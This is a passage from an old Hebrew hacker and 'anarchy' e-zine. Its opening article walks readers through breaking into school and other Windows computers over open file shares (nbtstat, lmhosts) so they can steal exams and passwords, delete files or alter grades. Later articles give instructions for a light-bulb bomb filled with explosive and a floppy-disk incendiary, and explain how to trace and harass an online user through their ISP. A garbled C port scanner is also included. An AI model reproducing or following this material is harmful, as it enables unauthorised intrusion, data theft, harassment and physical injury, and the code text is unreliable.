‫חדרתי להמון בתי ספר שרשת המחשבים שלהם הייתה בנויה בצורה כזו‪.‬‬
‫אז איך לעזאזל כל זה עובד?‬

‫מיקרוסופט השיקה יחד עם הווינדוס את האפשרות לשתף מדפסות או קבצים עם‬
‫מחשבים אחרים‪ .‬המחשבים האחרים האלה יכולים להיות מחשבים ממרחק חצי מטר‬
‫שמחוברים למחשב שהפעיל את השיתופים עם כבל‪ ,‬וזה יכול להיות‬
‫המחשב שלכם בבית שנמצא בכלל במדינה אחרת‪ ,‬מדינת היהודים‪.‬‬
‫השיתופים מבוססים על פרוטוקל ה ‪ smb‬שהוא פרוטקול הנותן למחשבים שונים לתקשר‬

‫ביניהם כמו כל פרוטוקול אינטרנט‪ .‬לכן שימוש בשיתופים כאמצעי חדירה יכול גם‬
‫להיעשות ממחשב עם לינוקס (לינוקס תומכת ב ‪.)smb‬‬
‫טוב‪ ,‬אז אתם בטח כבר מתים להתחיל‪ ,‬אבל איזה תוכנה אתם צריכים להוריד? כלום‪.‬‬
‫הכל בא יחד עם הווינדוס‪ .‬במקרה שהווינדוס שלכם צרוב‪ ,‬ישנם סיכויים‬
‫שתיאלצו להשיג לכם עותק מקורי של דיסק ההתקנה של ווינדוס ‪.95/98‬‬
‫אבל כנראה תסתדרו גם בלי זה‪.‬‬
‫בכל אופן‪ ,‬לחצו על התחל ‪ <-‬הגדרות ‪ <-‬לוח בקרה‬
‫לוח הבקרה מלא בשטויות‪ .‬תחפשו קובץ בשם 'רשת' עם סמל של מחשבים שמחוברים למדפסת‪.‬‬
‫לחצו על ה'רשת' פעמיים עם העכבר‪ .‬ייפתח לכם חלון חדש‪ .‬אתם תראו כי רכיבי רשת‬
‫כגון ‪ tcp/ip‬ו ‪ dial-up adapter‬מותקנים אצלכם במחשב‪.‬‬
‫בכדי שתוכלו להשתמש בפרוטוקול ה ‪ smb‬אתם צריכים ש ‪ 3‬רכיבי הרשת הבאים‬
‫יהיו מותקנים לכם במחשב‪:‬‬
‫* ‪tcp/ip‬‬
‫* ‪netbeui‬‬
‫* ‪client for microsoft networks‬‬
‫אם אחד מרכיבים אלה לא נמצא ברשימת הרכיבים‪ ,‬אתם צריכים להוסיף אותו‪.‬‬
‫בלי כל ארבעת רכיבים אלה‪ ,‬אינכם יכולים להתחבר לשיתופים על מחשבים אחרים‬
‫מה שלא נותן לכם גישה לקבצים שלהם‪ .‬חרא‪ .‬אז אני אתן פה הוראות להתקנת כל רכיב‪.‬‬
‫דרך אגב‪ ,‬אם יש לכם עוד רכיבים מותקנים‪ ,‬שלא ציינתי פה‪ ,‬זה בסדר גמור ואין עם‬
‫זה שום בעיה‪ .‬טוב‪ ,‬אז כדי להתקין את מה שאולי חסר לכם‪...‬‬
‫‪tcp/ip‬‬
‫אם חסר לכם רכיב זה‪ ,‬לחצו על הכפתור 'הוספה‪'...‬‬
‫בחרו ב פרוטוקול ‪ <-‬מיקרוסופט ‪ .tcp/ip <-‬יפה‪ .‬ט‪-‬עים מ‪-‬אוד‪.‬‬
‫‪netbeui‬‬
‫בחרו ב פרוטוקול ‪ <-‬מיקרוסופט ‪ .netbeui <-‬יפה‪ .‬ח‪-‬מים‪ .‬מ‪-‬אוד‪.‬‬
‫‪client for microsoft networks‬‬

‫בחרו ב לקוח ‪ <-‬מיקרוסופט ‪ .client for microsoft networks <-‬מ‪-‬געיל‪ .‬בעאה‪.‬‬
‫טוב‪ ,‬אז עכשיו שיש לכם את שלושת הרכיבים אתם כמעט ומוכנים לפריצה הראשונה שלכם‪.‬‬
‫מתחת ל "כניסה ראשית לרשת‪ ":‬בחרו באפשרות ‪.client for microsoft networks‬‬
‫כעת לחצו על כפתור ה ‪ ok‬או פשוט הקישו על מקש ה ‪ .enter‬אתם תתבקשו להפעיל את‬
‫המחשב מחדש‪ .‬עשו זאת‪ .‬אם לא נפתח חלון שביקש ממכם לעשות זאת‪ ,‬עשו זאת בכל מקרה‪.‬‬
‫טוב‪ ,‬נכנסתם לווינדוס מחדש‪ ,‬ואתם רוצים כבר להשיג סיסמאות‪ ,‬כרטיסי אשראי‪,‬‬
‫משחקים‪ ,‬תוכנות‪ ,‬מכתבים אישיים‪ ,‬לשנות ציונים‪ ,‬למחוק לאחרים קבצים‪,‬‬
‫אז איך לעזאזל פורצים???‬
‫אם אני לא טועה זאת אחת השאלות הנפוצות ביותר כיום בעולם הצ'אטים‪.‬‬
‫טוב‪ ,‬אז תמציאו כתובת איי פי של מחשב שאליו אתם מתכוונים לחדור‪.‬‬
‫תבדקו שאתם מחוברים לאינטרנט‪ ,‬פתחו חלון דוס‪ ,‬והקלידו‪:‬‬
‫‪nbtstat -a ipaddress‬‬
‫‪nbtstat -a 127.0.0.1‬‬
‫חשוב ש ה ‪ -a‬יהיה '‪ 'a‬ולא '‪.'a‬‬

‫בכל מקרה‪ ,‬אם תקבלו כתגובה‪:‬‬
‫‪host not found‬‬
‫זה אומר שלא תוכלו לחדור למחשב זה‪ .‬אז אתם שואלים איך לעזאזל אתם‬
‫אמורים למצוא מחשבים עם שיתופים שאליהם כן תוכלו לחדור???‬
‫ובכן‪ ,‬חשוב שתבינו פה שאין שיטה או קוד אחד שאייתו אפשר לחדור לכל מחשב בעולם‪.‬‬
‫זאת דוגמא טובה לדרך מסוימת לניצול חור אבטחה מסוים במערכת מסוימת‪.‬‬
‫מה שנותן לכם לחדור למחשבים מסוימים‪.‬‬
‫ובכן‪ ,‬יש לכם ‪ 2‬אפשרויות‪:‬‬
‫* חדירה למקום שאתם יודעים בוודאות כי יש לו שיתופים (לדוגמא‪ :‬בית ספר)‪.‬‬

‫* שימוש בסורק שיתופים‪ ,‬ואז לחדור למה שזה מוצא‪.‬‬
‫אז כשיש בידיכם כתובת איי פי של מחשב עם שיתופים‪ ,‬חיזרו לדוס‪ ,‬והקלידו‪:‬‬
‫‪nbtstat -a ipaddress‬‬
‫כאשר במקום ‪ ipaddress‬את מספר האיי פי‪ .‬אתם תקבלו טבלה שנראית בערך ככה‪:‬‬
‫‪netbios remote machine name table‬‬
‫‪name‬‬ ‫‪type‬‬ ‫‪status‬‬

‫‪---------------------------------------------‬‬
‫‪computer <00> unique registered‬‬
‫‪workgroup <00> group‬‬ ‫‪registered‬‬
‫‪computer <00> unique registered‬‬
‫‪mac address = 00-00-00-00-00-00‬‬
‫כמו שאתם רואים החלפתי את כל המספרים ל ‪.00‬‬

‫אני רוצה שתתמקדו שנייה באפסים שבין ה ><‪ .‬כאשר אתם רואים שם‬
‫את המספר ‪ ,20‬כלומר >‪ ,<20‬זה אומר שלמחשב זה‪ ,‬קיימים שיתופים‪ .‬כמה מדהים‪.‬‬
‫אוקי‪ ,‬אז הלכתם לבית ספר‪ ,‬בדקתם את כתובת האיי פי של השרת המרכזי‪,‬‬
‫או שעשיתם שימוש בסורק‪ ,‬ומצאתם מחשב עם שיתופים‪ ,‬ובבית קיבלתם טבלה עם המספר‬
‫>‪ <20‬מה שאישר את עצם העובדה כי יש לכם פה מחשב עם פוטנציאל רב‪,‬‬
‫עכשיו אנרכיסטים יקרים‪ ,‬הגיע הזמן לעשות את הדבר הבא‪:‬‬
‫פיתחו את הקובץ‪:‬‬
‫‪c:\windows\lmhosts.sam‬‬
‫קראו אותו עם עורך טקסט ‪ 3 ,2‬פעמים‪ .‬אם לא הבנתם משם כלום‪ ,‬לא נורא‪.‬‬
‫כעת לחצו על התחל ‪ <-‬הפעלה‪ ...‬והקלידו שם ‪ .notepad‬לחצו על מקש ה ‪.enter‬‬
‫זה ייפתח לכם את העורך החביב שלנו‪ .‬תדאגו שאתם מקלידים משמאל לימין של הקובץ‪.‬‬
‫הקלידו שם את האיי פי של המחשב שבו מצאתם שיתופים‪ .‬לדוגמא‪:‬‬
‫‪127.0.0.1‬‬
‫כעת שימרו את הקובץ בשם הבא‪:‬‬
‫‪c:\windows\lmhosts‬‬
‫פשוט כך‪.‬‬
‫אם יש לכם יותר מכתובת איי פי אחת שברצונכם לפרוץ אליה‪,‬‬
‫אז תפרידו בין כתובת לכתובת בעזרת הורדת השורה (עם מקש ה ‪)enter‬‬
‫הקובץ שלכם אמור להיראות כך‪:‬‬
‫‪127.0.0.1‬‬
‫‪112.179.15.9‬‬
‫‪37.105.1.17‬‬
‫טוב‪ ,‬אז יש לכם את הקובץ שמור‪ ,‬ועכשיו‪,‬‬

‫לרגע שחיכיתם לו‪ ...‬לחצו על תפריט התחל ‪ <-‬חפש ‪ <-‬מחשב‬
‫ייפתח לכם חלון חדש עם תיבת טקסט קטנה‪ ,‬הקלידו בה את האיי פי של המחשב‬
‫שאליו ברצונכם לפרוץ‪ ,‬לדוגמא‪ 127.0.0.1 :‬זאת אחרי שהאיי פי ששמרתם את האיי פי‬
‫בקובץ ‪ .c:\windows\lmhosts‬הקישו על מקש ה ‪ enter‬וחכו קצת‪.‬‬
‫לאחר זמן מה זה יימצא לכם מחשב‪ .‬לחצו עליו פעמיים עם העכבר‪.‬‬
‫חלון חדש ייפתח שייתן לכם להשתמש במחשב בדיוק כאילו הוא שלכם!!!‬
‫ברגע זה‪ ,‬שבו אתם מחטטים בקבצים של המחשב הפרוץ הראשון שלכם‪ ,‬אתם צריכים‬
‫להרגיש רגש עצום מלא גאווה‪ ,‬שמחה‪ ,‬והתלהבות‪ .‬עשיתם את זה!‬
‫פצתם למחשב ללא כל שימוש בסוס טרויאני‪ .‬ללא הורדת תוכנת האקינג של מישהו אחר‪.‬‬
‫עשיתם את זה‪ ,‬בעצמכם‪ .‬סחטיין‪.‬‬
‫שאלות ובעיות נפוצות‪:‬‬
‫ש‪ :‬כאשר אני מנסה למחוק לבני זונות קבצים‪ ,‬זה לא מאשר את המחיקה‪.‬‬
‫ת‪ :‬ישנם מחשבים שביטלו את האפשרות של הכתיבה בשיתופים‪ ,‬ולכן יהיה לכם רק‬
‫גישת קריאה מה שאומר שיש לכם גישה לכל הקבצים ותוכלו להעתיק דברים מעניינים‬
‫למחשב שלכם האישי‪ ,‬אבל לא תוכלו להעתיק קבצים ממכם אליהם או למחוק להם דברים‪,‬‬
‫או לגרום לכל שינוי במחשב שלהם‪ .‬גישה כזאת של קריאה בלבד עדיין יכולה להיות‬
‫יעילה ביותר‪ .‬היא לא תיתן לכם לשנות למישהו בבית ספר את הציון בתעודה‪ ,‬אבל תוכלו‬
‫להשיג עותק של המבחן הבא ולחלק אותו לכולם ככה שיהיו מוכנים עם התשובות מראש‪.‬‬
‫ש‪ :‬כשאני לוחץ פעמיים על המחשב שנמצא‪ ,‬זה מבקש סיסמא‪.‬‬
‫ת‪ :‬במקרים מעטים המחשבים שאליהם ברצונכם לפרוץ יהיו מוגנים עם סיסמא‪,‬‬
‫במקרה כזה יש לכם ארבעה אפשרויות‪:‬‬
‫* לנחש את הסיסמא‬
‫* להשתמש בתוכנה שתנסה כל אפשרות בעולם עד שזה יימצא את הסיסמא (לוקח שעות)‪.‬‬
‫* לפרוץ את הסיסמא בעזרת תוכנה שתסיר את הסיסמא בעזרת חור אבטחה‬

‫שנמצא בהגדרת הסיסמא לשיתופים במערכת ווינדוס (גם אופציה זאת תיקח שעות)‪.‬‬
‫* לוותר על המחשב הזה ולנסות מחשב אחר‪.‬‬
‫אני ממליץ לנסות את האפשרות הראשונה‪ ,‬אם לא הולך לכם אז תעברו לאחרונה‪.‬‬
‫אבל תעשו מה שבא לכם‪ ,‬ואיך שבא לכם‪ ,‬כי אחרי הכל‪ ,‬זאת הפריצה שלכם‪.‬‬
‫ש‪ :‬איפה אני יכול למצוא סורק שיתופים?‬
‫ת‪ :‬הנה כמה שמות של סורקים מפורסמים‪:‬‬

‫‪ogre‬‬
‫‪legion‬‬
‫‪nbtscan‬‬
‫‪vir0x‬‬
‫פשוט חפשו אחד מהם באתר חיפוש כגון‪altavista.com :‬‬

‫השימוש בכל סורק שונה‪ ,‬ולכן פשוט קיראו את קובץ ההוראות המצורף‪ ,‬ובהצלחה‪..‬‬
‫ש‪ :‬איך אוכל להשתמש במדפסת על המחשב הפרוץ?‬
‫ת‪ :‬אם תראו שעל המחשב נמצאת מדפסת שגם היא משותפת‪ ,‬לחצו עליה פעמיים‪.‬‬
‫אתם תתבקשו להתקין את הדרייברים על המחשב שלכם‪ .‬אחרי שפעולה זאת הסתיימה‪,‬‬
‫סמנו את הקובץ שברצונכם להדפיס (לא חשוב אם הוא נמצא על המחשב שלכם או שלהם)‬
‫לחצו על ‪ ,ctrl + c‬כעת סמנו את המדפסת על המחשב הפרוץ ולחיצו על ‪.ctrl + v‬‬
‫ההדפסה תחל ותקפיץ את האנשים של המחשב הפרוץ ב ‪ -‬אאאההההההההההה!!!!!!!!!!!‬
‫ש‪ :‬נגנבתי על הפריצה‪ ,‬זה היה ממש מדליק‪ ,‬אבל היא עובדת רק על מחשבים מסוימים‬
‫ואני רוצה לפרוץ לכל המחשבים בעולם‪ .‬איך אני יכול לפרוץ לכל מחשב בלי להוריד‬
‫שום תוכנה סתאם ככה מהמחשב שלי עם ווינדוס וחיבור לאינטרנט?‬
‫ת‪fuck you :‬‬
‫תרגישו חופשי לפרוץ לאן שבא לכם ולהרוס כל מה שבא לכם‪ ,‬הכל על חשבוני‪.‬‬
‫שלכם‪ ,‬גיהינום‬
‫פצצת מנורה‬
‫פעולה אוטומטית בכניסה לחדר חשוך היא הדלקת האור‪.‬‬

‫זה יכול להיות קטלני‪ ...‬אם פצצת מנורה מוקמה במנורת התייקרה‪.‬‬
‫פצצת מנורה היא קלה ביותר להכנה‬
‫בחלק מהמנורות הזכוכית ניתנת לפירוק ע"י חימום של הבסיס עם מבער ריתוך או כיריים‬
‫של מטבח וכשהדבק נהיה חם מספיק זה ניתן להסרה‪.‬‬
‫בחלק אחר של הנורות נדרש חימום נקודתי ע"י מבער ריתוך או מבער אוקסיאצטילן‪.‬‬
‫בכל אחד מהמקרים‪ ,‬לאחר שהבסיס והזכוכית קוררו לטמפרטורת החדר הם ניתנים למילוי‬
‫בחומר נפץ כמו אבק שריפה או כל דבר אחר‪.‬‬
‫אם הזכוכית נותקה מהבסיס היא חייבים להדביק אותה חזרה‪ ,‬ואם נוצר חור בזכוכית‬
‫חייבים לכסות אותו בנייר דבק כדי לשמור את חומר הנפץ בפנים‪.‬‬
‫לאחר מכן כל שנותר לעשות הוא להבריג את המנורה לתוך בית המנורה‬
‫(רצוי לנתק קודם את החשמל לחדר כאמצעי בטיחות ‪):‬‬
‫הכתבה נכתבה ע"י ‪.rel8t‬‬

‫אנרכיה‬
‫בזמן האחרון יש לנו הרבה מקרים של 'אנרכיסטים' שמבינים לא נכון את כל העניין של אנרכיה‪.‬‬
‫כתבתי אנרכיסטים במירכאות כי אלה לא אנרכיסטים‪ .‬הם מייצגים את עצמם ואת עצמם בלבד‪.‬‬
‫ולכן רציתי לכתוב פה כתבה שתסביר מה זה כן האנרכיה‪ .‬מה בעצם נותן לנו את הרשות לונדליזם‪,‬‬
‫או לכל דרך אחרת שבה אנו האנרכיסטים מתבטאים‪ .‬לתת לכם הילדים השמנים בבית‪ ,‬שמשעמם‬
‫להם בחיים ורוצים קצת משהו מעניין ולכן קוראים את המילים האלה‪ ,‬לראות הכל מזווית הראיה‬
‫הנכונה‪.‬‬
‫ובכן‪ ,‬ניסיתי עוד פעם ועוד פעם ועוד פעם לנסח את האמת שעומדת מאחורי כל הרעיון של האנרכיה‪.‬‬
‫או איך שאני רואה אותה לפחות‪ .‬אבל לא משנה מה כתבתי ואיך כתבתי זה לא יצא כמו שרציתי ולא‬
‫הציג‬
‫את הדברים כמו שרציתי שזה יציג אותם‪ .‬לכן כל מה שאני יכול להגיד לכם זה לראות את הסרט‬
‫‪.antz‬‬
‫אם כי הסרט לא ממש מדבר על אנרכיה‪ ,‬והנמלה בסופו של דבר מחליטה שהדרך הטובה ביותר היא‬
‫שלטון‪,‬‬
‫וחיים בתוך מערכת‪ ,‬אלא שהפעם היא חלק מהמערכת מתוך רצון‪ ,‬כאשר לכל אחד יש השפעה חזקה‬
‫וטובה יותר‪,‬‬
‫וכולם (כך נראה לפחות) מרוצים מהשלטון החדש‪ ,‬והפעם הכל בנוי כמו שהנמלה רצתה‪ ,‬הסרט עדיין‬
‫מציג‬
‫בצורה כלשהי קצת את הרעיון של אנרכיה‪ .‬זה לא מציג את זה כמו שהייתי רוצה להציג את זה‪,‬‬
‫אבל זה עדיף מכל הניסיונות שלי להסביר את ראיית העולם שלי כאנרכיסט‪.‬‬
‫תיהנו מהסרט‪.‬‬
‫שלכם‪gehenom ,‬‬
‫פצצת דיסקט‬
‫חומרים‪:‬‬
‫· דיסקט‬
‫· מספריים‬
‫· גפרורי מטבח לבנים או כחולים (חייבים להיות בצבע הזה!!)‬
‫· לכה שקופה לציפורניים‬
‫‪ .1‬פתחו בעדינות את הדיסקט (כאלה של ‪ 3‬אניץ' ומעלה הכי טובים למטרה זאת)‪.‬‬
‫‪ .2‬הסירו את עטיפת הכותנה מבפנים‪.‬‬
‫‪ .3‬גרדו הרבה אבקה מהגפרורים לתוך צלחת (השתמשו במגרדת מעץ‪ ,‬מתכת תצית את הגפרורים‬
‫ביחד איתכם ‪)..‬‬
‫‪ .4‬אחרי שיש לכם הרבה אבקה‪ ,‬פזרו אותה בנדיבות בתוך הדיסקט‪.‬‬
‫‪ .5‬שפכו את הלכה מעל האבקה שפיזרתם‪.‬‬
‫‪ .6‬תנו לעסק להתייבש…‬
‫‪ .7‬בזהירות חברו בחזרה את הדיסק והיעזרו בלכה לסגור אותו מבפנים (איפה שפתחתם)‪.‬‬
‫‪ .8‬תנו את הדיסקט למישהו שאתם מאוד אוהבים…‬
‫מה שיקרה הוא שכשהכונן ינסה לקרוא את הדיסקט תהיה שרפה קטנה (מספיק חום כדי להימס את‬
‫כונן הדיסקטים ולדפוק את ראש הקריאה של הכונן!)‪ .‬צפו בהנאה כשהטכנאים לא מבינים מה עבר‬
‫על המחשב…‬
‫במדריכי האנרכיה הבאים‪ :‬איך להפנט בנאדם בעשר דקות‪ ,‬איך לשגע את רשת מקדולנדס‪ ,‬והשיטות‬
‫הטובות ביותר לגידול מריחואנה בחצר‪ .‬סתאם‪ ,‬לא‪ .‬תהיו ילדים טובים כמוני‪ .‬איכסה אנרכיה‪.‬‬
‫אוהבת תמיד‪,‬‬
‫בלאדי‪.‬‬
‫‪port scaning‬‬
‫אהללללללןןןןן‬
‫מה המצבבבבבבב?‬
‫אז ככה ‪ -‬פעם אחת ניסיתי למצוא אינפו על משהו‪ .‬רציתי להריץ פורט סקאנינג‪ .‬בדרך כלל אני אוהבת‬
‫לנסות להיכנס לפורטים הידועים ידנית (דרך טלנט)‪ ,‬אבל במקרה ההוא אחרי שעשיתי את הבדיקה‬
‫הידנית לפורטים הידועים רציתי להריץ סקנינג כולל‪ ,‬לדעת אם יש איזה פורט פתוח אחר‪ .‬אז העליתי‬
‫את הקומפיילר שלי‪ ,‬וכתבתי משהו מהיר שיעשה בשבילי את העבודה‪.‬‬
‫אז‪ ...‬גיהינום ביקש שאני אפרסם את הקוד פה (זה בשפת ‪ )c‬אז הנה פרסמתי‪ .‬זה היה לפני שהוא עזב‬
‫את האתר ולא יודעת למה הוא לא פרסם את זה עד עכשיו‪ .‬בכל מקרה‪ ,‬אל תשתמשו בזה כפורט סקנר‬
‫כי הוא א‪-‬י‪-‬ט‪-‬י בטירוף (אחרי חצי שעה הוא בקושי הספיק לסרוק פחות מ‪ 50-‬פורטים) אבל זה תרגול‬
‫טוב לסוקטים ולתכנות ברמות הנמוכות שדיסקסתי במדריכים הקודמים ושוב‪ ,‬זה משהו שכתבתי ב‪-‬‬
‫‪ 5‬דקות לצורך מסויים‪ .‬אז נכון שיש הרבה דברים שיכולתי לעשות כדי להאיץ קצת את הפעולה‬
‫(לפתוח כמה סוקטים במקביל‪ ,‬להוציא הוראות מהלולאה) או לשפר אותה קצת (לאפשר גם להתחבר‬
‫ב ‪ dns‬ולא רק בכתובת ‪ ip‬אבל זה תמיד מסתבך לי משום מה) אבל לא היה לי כוח‪.‬‬
‫בעיקרון התוכנה הקטנה הזאת מבקשת את האייפי שאתם רוצים להתחבר אליו (השיגו אותו בעזרת‬
‫‪ )netstat -a‬ומנסה להתחבר לפורטים ‪ 1-1024‬על אותו אייפי‪ .‬שימו לב להוראה ‪for‬‬
‫‪)++)port=1;port<1024;port‬‬
‫שבודקת את הפורטים ‪ .1-1024‬אם בא לכם לבדוק מספרים אחרים‪ ,‬פשוט שנו את המספרים‪( .‬אפשר‬
‫גם לדוגמה להריץ פעמיים את התוכנה כאשר אחת סורקת ‪ 1-50‬ואחת סורקת ‪ 1-100‬וכדומה)‪.‬‬
‫התוכנה שולחת בקשה לפתיחת סוקט בפורטים ‪ .1-1024‬אם הבקשה נענית בחיוב (יש האזנה על‬
‫השרת לאותו פורט) התוכנה רושמת את מספר הפורט על המסך‪.‬‬
‫כמו שאמרתי‪ ,‬זה מ‪-‬א‪-‬ו‪-‬ד א‪-‬י‪-‬ט‪-‬י (אבל מאוד!) אז אל תיבהלו אם אחרי עשר דקות אתם עדיין לא‬
‫רואים כלום על המסך‪.‬‬
‫כדי לבדוק לאיזה פורט התוכנה הגיעה‪ ,‬הקלידו בחלון דוס‪:‬‬

‫‪netstat -a‬‬
‫ותראו את כל הפורטים הפתוחים אצלכם‪ .‬הפורט שלידו כתוב‬
‫‪syn_sent‬‬
‫זהו הפורט אליו מנסה התוכנה להתחבר כרגע‪.‬‬
‫בקשר לקומפיילרים‪ ,‬כמובן שאין אין אין כמו ‪ gcc‬אבל אם אתם כמוני שתקועים על ווינדוס‪ ,‬יש‬
‫תחליף של ‪ lcc‬שזה קומפיילר הבנוי בצורת ‪ .gcc‬קומפיילר מצוין‪ ,‬אבל יש לו את הקריזות שלו‪ ,‬ולכל‬
‫תוכנית צריך לפתוח פרוייקט חדש בכל פעם‪ ,‬ועד שמצליחים ליצור קובץ חדש יוצאת הנשמה‪.‬‬
‫‪>include <stdio.h#‬‬
‫‪>include <winsock.h#‬‬
‫‪>include <winsock32.h#‬‬
‫‪>include <windows.h#‬‬
‫‪)void winsock_init)void‬‬
‫{‬
‫‪;wsadata info‬‬
‫‪)if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫‪;)messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫}‬
)][int main)int argc,char *argv
{
/* ...winsock_init)(; /* the windows intialization stuff
;int sockfd
;int port
;struct sockaddr_in dest_addr
/* char ip[16]; /* will hold the ip address we wish to connect to
;)" ?printf("\ndestination ip
;)gets(ip
/* ??bzero)&)my_addr.sin_zero(,8(;*/ /* why this doesn't work*/
)++for )port=1;port<1024;port
{
;)sockfd = socket)af_inet,sock_stream,0
;dest_addr.sin_family = af_inet
;)dest_addr.sin_port = htons)port
;)dest_addr.sin_addr.s_addr = inet_addr)ip
if )connect)sockfd, )struct sockaddr *(&dest_addr, sizeof)struct sockaddr((
)>= 0
{
;)printf)"\n%d", port
/* if connected successfully, return port num */
}
/* shutdown)sockfd,3(; /* close the socket for sending and receiving

}
;)".printf)"connection closed
/* return 0; /* return a success value
}
,have fun
,‫אוהבת‬
.bloody
‫טיפול "משמעתי" בקרציות‬
‫שלום אחים שלי‪.‬‬
‫הנה טריק קטן שחברים שלכם יחשבו שהם גברים‪.‬‬
‫כל אחד מכיר איזה ילד דפוק ומעצבן שמתקרצץ ומנסה לפרוץ לכם למחשב ‪ ,‬לא?‬
‫או סתם איזה מפגר שמעצבן אתכם‪.‬‬
‫פשוט‪.‬‬
‫תדברו אייתו באי סי קיו או באי אר סי‪.‬‬
‫פיתחו חלון דוס‪.‬‬

‫הקלידו ‪.netstat -a‬‬
‫גלו את האי פי או את ההוסט שלו‪.‬‬

‫אם מצאתם איי פי ‪ ,‬זה מצוין‪.‬‬
‫אם מצאת הוסט ‪ ,‬הורידו תוכנה ההופכת הוסט לאיי פי‪.‬‬
‫*** הערה מבלאד ראנר‪ :‬לא צריך תוכנה ההופכת הוסט לאייפי‪ ,‬פשוט הקלידו ‪ netstat -an‬כדי לקבל‬
‫את הכתובת בצורה נומרית (יענתו בצורת אייפי) ***‬
‫עכשיו‪.‬‬
‫הסתכלו על השעון בתחתית המסך‪.‬‬
‫לפי ההוסט ( או האי פי אם אתה טיפה אינטליגנטים) מיצאו את חברת האינטרנט של משתמש זה‪.‬‬
‫עכשיו ‪ ,‬גילשו לאתר של חברת האינטרנט הזאת ‪ ,‬ורישמו את מספר הטלפון שלה‪.‬‬
‫כעט ‪ ,‬התקשרו לחברת האינטרנט ‪ ,‬ואימרו את הדברים הבאים‪:‬‬
‫" מדבר ‪ ....‬הרגע מישהו ניסה לפרוץ לי למחשב ‪ .....‬והאי פי שלו הוא‪.....‬הוא ניסה לפרוץ בשעה‪...‬‬
‫ותשמעו אמינים לא סתם ילדים קטנים שעושים שטויות‪.‬‬
‫עכשיו ‪ ,‬תקראו טוב את מה שאני רושם עכשיו‪:‬‬
‫חברת האינטרנט מחויבת לתת לכם את הטלפון של אותו משתמש!!!!!!!!!!!!‬
‫עכשיו‪...‬‬
‫תתקשרו לאותו בן אדם‪...‬ותגידו לו מה ניסית לפרוץ לי למחשב‪........‬‬
‫‪):‬‬
‫שין שן‬
‫‪icefire3k‬‬
‫גפרורים שמישים מתחת למים‬
‫אתם צריכים‪:‬‬
‫‪-‬חבילה של ‪ 10‬דיודות סיליקון (תדעו שקיבלתם את הדבר הנכון אם אלה חפצים קטנים מזכוכית)‬
‫‪-‬חבילת גפרורים‬
‫‪-‬נר‬
‫‪-‬הדליקו את הנר ותנו ל"בריכה" של שעווה להיווצר בחלק העליון‬
‫‪-‬הצמידו את החלק מהזכוכית של דיוקה אחת ולפפו את אחד הקצוות שלה מסביב לגפרור והוציאו‬
‫את הקצה החוצה‬
‫עשו אותו דבר עם הקצה השני אבל בכיוון מנוגד‪ ,‬עכשיו שני הקצוות צריכים להיות מלופפים מסביב‬
‫לגפרור אבל לא נוגעים אחד בשני!!!!‬
‫‪-‬הכניסו את ראש הגפרור לתוך "בריכת" השעווה כך שיווצר כיסוי עמיד במים‬
‫‪-‬הכינו כמה כאלה שתרצו‬
‫‪-‬כשהדיודה מחוברת לבטריה של ‪ 6‬וולט‪ ,‬היא מגיעה למה שנקרא מתח שבירה‬
‫כשרוב הרכיבים האלקטרוניים מגיעים לנקודה זו‪ ,‬הם מפיקים כמות גדולה של חום ואור(שנמס מהר‬
‫מאוד לכתם קטן)‬
‫החום הזה מספיק כדי להצית את הגפרורים שיעבדו מתחת למים‪( .‬כשרוב הגפרורים מסרבים‬
‫להידלק ‪):‬‬
‫‪icefire3k‬‬
‫שרתי פרוקסי‬
‫"‪"death comes to us all‬‬

‫‪ella shalvi‬‬
‫שרת פרוקסי הוא בעצם שרת אשר דרכו אתם מתחברים לאתר אשר אליו אתם מתחברים‪.‬‬
‫כלווווווווווווווווווווומממממממממממרררר‪....‬‬
‫כשאתם נכנסים לאתר מה שקורה זה שדרך ספק האינטרנט שלכם אתם מתחברים לשרת שעליו‬
‫מאוחסן האתר‪,‬‬
‫והוא נותן לדפדפן שלכם את הקוד של האתר שפעם היה בנוי מ ‪ html‬ומה לעשות שהיום זה לא תמיד‬
‫ככה‪.‬‬
‫היום הוא יכול להיות אומנם מורכב מ ‪ ,html‬אבל זה רק יהיה בין השאר‪...‬‬
‫כי יש לנו את ‪ flash‬של מקרומדיה ואל תשכחו את כל ה ‪script languages‬‬
‫ויש גם ‪ cgi‬ו ‪ asp‬וכו'‪ .‬טוב‪ ,‬בכל מקרה‪ ,‬הדפדפן מקבל את‬
‫האתר בפורמט ‪ html‬ואח"כ מתרגם את זה למה שאתם רואים על המסך‪.‬‬
‫זה פחות‪-‬או‪-‬יותר מה שקורה‪.‬‬
‫יותר פחות מאשר יותר‪.‬‬
‫או מצד שני פחות יותר מאשר פחות‪.‬‬
‫או בעצם‪ ..‬לא חשוב‪.‬‬
‫מה ששונה בשימוש בשרת פרוקסי הוא שבמקום להתחבר "ישירות" אל האתר‪ ,‬אתם עושים זאת דרך‬
‫שרת הפרוקסי‪ .‬מה שגורם לשני דברים עיקריים‪:‬‬
‫‪ .1‬התחברות מהירה יותר ‪ /‬איטית יותר (תלוי)‬
‫‪ .2‬אנונימיות‪.‬‬
‫כן‪ ,‬אנונימיות‪ .‬לא‪ ,‬א‪.‬נ‪.‬ו‪.‬נ‪.‬י‪.‬מ‪.‬י‪.‬ו‪.‬ת‪.‬‬

‫כן‪ ,‬לא‪ ,‬כן‪ ,‬לא‪ ,‬כן כן כן כן כן כן כן כן כן‪.‬‬
‫מה גורם להתחברות מהירה יותר?‬

‫ובכן‪ ,‬בואו נאמר שהמחשב שלכם הוא ‪ a‬והאתר שאליו אתם רוצים להגיע הוא ‪.b‬‬
‫בכדי שהמחשב ‪ a‬יוכל ליצור קשר עם המחשב ‪ b‬שעליו נמצא האתר‪ ,‬הוא צריך להתחבר דרך מלא‬
‫מלא‬
‫מחשבים‪ .‬למה? כי ככה‪ .‬כי המחשבים ‪ a‬ו ‪ b‬מרוחקים מאוד מבחינה גיאוגרפית‪ a .‬נמצא בישראל‪,‬‬
‫ו ‪ b‬נמצא באמריקה‪ .‬אז ‪ a‬עושה את הדרך הבאה‪:‬‬
‫‪a-f-u-c-k-t-h-e-g-o-v-e-r-m-e-n-t-b‬‬
‫כלומר‪ ,‬הוא היה צריך להתחבר לכל המחשבים האלה (‪ )fuckthegoverment‬עד שהוא הגיע ל ‪.b‬‬
‫עכשיו‪ ,p ,‬שרת הפרוקסי שלנו‪ ,‬יעזור לנו להגיע לשם יותר מהר‪ .‬למה? כי במקום להתחבר דרך‬
‫כל כך הרבה מחשבים אנחנו עושים את הדבר הבא‪:‬‬
‫‪a-f-u-c-k-p-y -b‬‬
